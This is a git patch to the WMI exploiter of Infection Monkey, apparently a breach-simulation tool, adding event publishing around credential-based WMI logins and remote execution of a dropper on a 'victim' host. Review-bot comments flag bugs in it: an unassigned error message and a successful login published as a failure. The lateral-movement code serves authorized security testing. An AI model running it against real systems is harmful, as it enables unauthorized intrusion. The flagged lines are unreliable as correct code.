From ed191bcf6104b2ba9b62fc9a6e50f05a5a3049bd Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski
Date: Fri, 7 Oct 2022 13:55:49 +0200
Subject: [PATCH] Agent: Publish events from WMI
---
 monkey/infection_monkey/exploit/wmiexec.py | 37 +++++++++++++---------
 1 file changed, 22 insertions(+), 15 deletions(-)
diff --git a/monkey/infection_monkey/exploit/wmiexec.py b/monkey/infection_monkey/exploit/wmiexec.py
index 0788ff813..0ccf5bfe6 100644
--- a/monkey/infection_monkey/exploit/wmiexec.py
+++ b/monkey/infection_monkey/exploit/wmiexec.py
@@ -2,6 +2,7 @@ import logging
 import ntpath
 import socket
 import traceback
+from time import time
 from impacket.dcerpc.v5.rpcrt import DCERPCException
@@ -44,6 +45,7 @@ class WmiExploiter(HostExploiter):
 wmi_connection = WmiTools.WmiConnection()
+ timestamp = time()
 try:
 wmi_connection.connect(
 self.host,
@@ -55,26 +57,34 @@ class WmiExploiter(HostExploiter):
 )
 except AccessDeniedException:
 self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
- logger.debug(f"Failed connecting to {self.host} using WMI")
+ error_message = f"Failed connecting to {self.host} using WMI"
+ logger.debug(error_message)
+ self._publish_exploitation_event(timestamp, False, error_message=error_message)
 continue
 except DCERPCException:
 self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
 logger.debug(f"Failed connecting to {self.host} using WMI")
+ self._publish_exploitation_event(timestamp, False, error_message=error_message)
 continue
 except socket.error:
- logger.debug(f"Network error in WMI connection to {self.host}")
+ error_message = f"Network error in WMI connection to {self.host}"
+ logger.debug(error_message)
+ self._publish_exploitation_event(timestamp, False, error_message=error_message)
 return self.exploit_result
 except Exception as exc:
- logger.debug(
+ error_message = (
 f"Unknown WMI connection error to {self.host}: "
 f"{exc} {traceback.format_exc()}"
 )
+ logger.debug(error_message)
+ self._publish_exploitation_event(timestamp, False, error_message=error_message)
 return self.exploit_result
 self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
 self.exploit_result.exploitation_success = True
+ self._publish_exploitation_event(timestamp, False, error_message=error_message)
 downloaded_agent = self.agent_binary_repository.get_agent_binary(self.host.os["type"])
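Review bot: The `except DCERPCException` branch passes `error_message` to `_publish_exploitation_event` without assigning it, so on the first failed credential this raises UnboundLocalError, and on a later loop iteration it publishes the stale message left by a different branch; mirror the AccessDeniedException branch with `error_message = f"Failed connecting to {self.host} using WMI"` and `logger.debug(error_message)` before the publish call. The success path has the mirror-image defect: right after `self.exploit_result.exploitation_success = True` it publishes `False` with an unbound or stale `error_message`, so that call should be `self._publish_exploitation_event(timestamp, True)`; as written, the island's event stream will record a successful WMI login as a failure. The enclosing method and its credential loop start before this hunk (the `timestamp = time()` it relies on is in the previous hunk), and `_publish_exploitation_event` is presumably provided by HostExploiter — worth confirming its signature accepts `error_message` as a keyword.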
@@ -113,33 +123,30 @@ class WmiExploiter(HostExploiter):
 } + build_monkey_commandline(self.servers, self.current_depth + 1)
 # execute the remote monkey
+ propagation_timestamp = time()
 result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(
 cmdline, ntpath.split(remote_full_path)[0], None
 )
 if (0 != result.ProcessId) and (not result.ReturnValue):
 logger.info(
- "Executed dropper '%s' on remote victim %r (pid=%d, cmdline=%r)",
- remote_full_path,
- self.host,
- result.ProcessId,
- cmdline,
+ f"Executed dropper '{remote_full_path}' on remote victim {self.host} "
+ f"(pid={result.ProcessId}, cmdline={cmdline})"
 )
 self.add_vuln_port(port="unknown")
 self.exploit_result.propagation_success = True
+ self._publish_propagation_event(propagation_timestamp, True)
 else:
 error_message = (
- "Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, "
- "cmdline=%r)",
- remote_full_path,
- self.host,
- result.ProcessId,
- result.ReturnValue,
- cmdline,
+ f"Error executing dropper '{remote_full_path}' on remote victim {self.host} "
+ f"(pid={result.ProcessId}, exit_code={result.ReturnValue}, cmdline={cmdline})"
 )
 logger.debug(error_message)
 self.exploit_result.error_message = error_message
+ self._publish_propagation_event(
+ propagation_timestamp, False, error_message=error_message
+ )
 result.RemRelease()
 wmi_connection.close()
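Review bot: The `logger.info(f"Executed dropper ...")` rewrite trades the lazy `%`-style arguments for an eagerly formatted f-string and drops the `%r` quoting on `self.host` and `cmdline`, so the host and command line are now rendered with `str()` and any quotes or whitespace inside them are no longer delimited in the log; keeping `logger.info("Executed dropper '%s' on remote victim %r (pid=%d, cmdline=%r)", remote_full_path, self.host, result.ProcessId, cmdline)` preserves both properties at no cost. Building `error_message` as an f-string is a genuine fix (the removed version assigned a tuple, not a string) and the same `{self.host!r}`/`{cmdline!r}` conversions would keep its quoting consistent with the success branch. The enclosing method begins before this hunk and continues past `wmi_connection.close()`.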